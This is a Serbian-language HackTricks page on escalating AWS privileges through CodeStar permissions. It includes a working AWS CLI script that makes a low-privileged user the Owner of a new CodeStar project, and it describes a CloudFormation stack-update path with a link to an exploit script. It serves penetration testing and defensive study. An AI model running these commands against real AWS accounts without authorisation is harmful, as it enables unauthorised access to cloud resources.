AWS - Codestar Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Codestar

Više informacija o codestar-u možete pronaći u:

pagecodestar:CreateProject, codestar:AssociateTeamMember

iam:PassRole, codestar:CreateProject

Sa ovim dozvolama možete zloupotrebiti codestar IAM ulogu da biste izvršili proizvoljne akcije putem cloudformation šablona. Proverite sledeću stranicu:

pageiam:PassRole, codestar:CreateProject

codestar:CreateProject, codestar:AssociateTeamMember

Ova tehnika koristi codestar:CreateProject da bi kreirala codestar projekat, i codestar:AssociateTeamMember da bi napravila IAM korisnika vlasnikom novog CodeStar projekta, što će im omogućiti novu politiku sa nekoliko dodatnih dozvola.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

Ako već imate članstvo u projektu, možete koristiti dozvolu codestar:UpdateTeamMember da biste ažurirali svoju ulogu u vlasnika umesto codestar:AssociateTeamMember

Potencijalni uticaj: Privesc na generisanu codestar politiku. Primer te politike možete pronaći u:

pagecodestar:CreateProject, codestar:AssociateTeamMember

codestar:CreateProjectFromTemplate

  1. Kreiranje novog projekta:

  • Koristite akciju codestar:CreateProjectFromTemplate da biste započeli kreiranje novog projekta.

  • Nakon uspešnog kreiranja, automatski se dodeljuje pristup za cloudformation:UpdateStack.

  • Ovaj pristup se posebno odnosi na stek koji je povezan sa IAM ulogom CodeStarWorker-<generičko ime projekta>-CloudFormation.

  1. Ažuriranje ciljnog steka:

  • Sa dodeljenim dozvolama za CloudFormation, nastavite sa ažuriranjem određenog steka.

  • Ime steka obično će se pridržavati jednog od dva obrasca:

  • awscodestar-<generičko ime projekta>-infrastructure

  • awscodestar-<generičko ime projekta>-lambda

  • Tačno ime zavisi od izabranog obrasca (referenca na primer eksploatacionog skripta).

  1. Pristup i dozvole:

  • Nakon ažuriranja, dobijate mogućnosti dodeljene CloudFormation IAM ulozi povezanoj sa stekom.

  • Napomena: Ovo ne pruža inherentno potpune administratorske privilegije. Možda će biti potrebni dodatni netačno konfigurisani resursi unutar okruženja da bi se dalje povećale privilegije.

Za više informacija pogledajte originalno istraživanje: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Eksploataciju možete pronaći na https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Potencijalni uticaj: Privesc na cloudformation IAM ulogu.

Naučite hakovanje AWS-a od početka do naprednog nivoa sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Last updated